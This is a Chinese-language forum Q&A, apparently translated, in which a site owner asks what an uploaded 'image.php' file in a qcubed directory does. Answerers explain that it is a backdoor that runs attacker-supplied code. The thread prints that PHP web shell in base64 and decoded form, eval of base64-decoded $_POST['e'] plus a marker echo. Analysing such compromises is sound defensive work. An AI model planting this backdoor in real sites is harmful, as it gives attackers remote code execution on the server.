base64 编码的 $_POST['e'] 变量上的 eval 实际上做了什么？

Question

好吧，这就是我在 google 上搜索的内容：

似乎有一个名为“image.php”的上传文件上传到 qcubed 目录中。

该 image.php 文件包含以下 base64 代码：

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

已解码它添加到此：

if(isset($_POST['e']))

eval(base64_decode($_POST['e']));

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

搜索输出的字符串我在其他站点上发现了类似的 qcubed 漏洞。

解码我得到的最后一个回显字符串：

196.231-172.28:ifacermpubmice:afac42eri02

我真的不明白它的作用（使用：http:// ostermiller.org/calc/encode.html）。

您能解释一下我在这里面临的具体情况吗？ 为了解决这个问题，我应该解决哪些安全漏洞？

Answer 1

该脚本将执行从 e POST 变量获取的任何 PHP 代码，这当然是一个可怕、最危险的漏洞。

echo 语句可能是对攻击脚本的确认，即已安装正确的版本或其他内容。

但是，只有当 image.php 文件实际上可以在该目录中执行时，这才是危险的。如果不知道文件最初是如何到达那里的，就很难给出该怎么做的建议。

Answer 2

脚本小子很可能使用漏洞利用闯入您的网站。确保您的 PHP 应用程序和库是最新的。